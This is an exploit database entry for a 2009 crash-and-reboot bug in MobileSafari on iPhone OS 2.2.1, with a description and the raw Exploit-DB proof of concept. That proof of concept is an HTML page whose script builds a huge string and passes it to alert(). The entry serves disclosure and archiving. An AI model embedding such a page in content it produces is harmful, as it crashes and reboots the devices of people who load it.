header-logo
Suggest Exploit
vendor:
iPhone
by:
TheLeader, GSOG
7,8
CVSS
HIGH
Buffer Overflow
119
CWE
Product Name: iPhone
Affected Version From: 2.2.1
Affected Version To: 2.2.1
Patch Exists: YES
Related CWE: N/A
CPE: apple:iphone_os
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: iOS
2009

Apple iPhone (MobileSafari) Crash & Reboot

The vulnerability exists in MobileSafari of Apple iPhone. When a maliciously crafted webpage is loaded in MobileSafari, it causes a buffer overflow which leads to a crash and reboot of the device. The exploit code contains a JavaScript loop which creates a large string of 500000 characters and then alerts it, causing the buffer overflow.

Mitigation:

Apple has released a patch for this vulnerability.
Source

Exploit-DB raw data:

# Apple iPhone (MobileSafari) Crash & Reboot
# TheLeader, GSOG [st0p] hotmail [sp4m] com
# Shoutz: hacking.org.il nullbyte.org.il

# Tested on iPod Touch 2G, OS 2.2.1
# Launch MobileSafari, enter the page and MobileSafari will freeze.
# Wait for 4-5 minutes and the device will spontaneously reboot.

# Exploit:

<html>
<body>
<script>
var a = '';
for (var i = 1; i <= 500000; i++)
{
  a += '\n';
}
alert(a);
</script>
</body>
</html>

# milw0rm.com [2009-08-31]

Navigation

Suggest Exploit

Services By CQR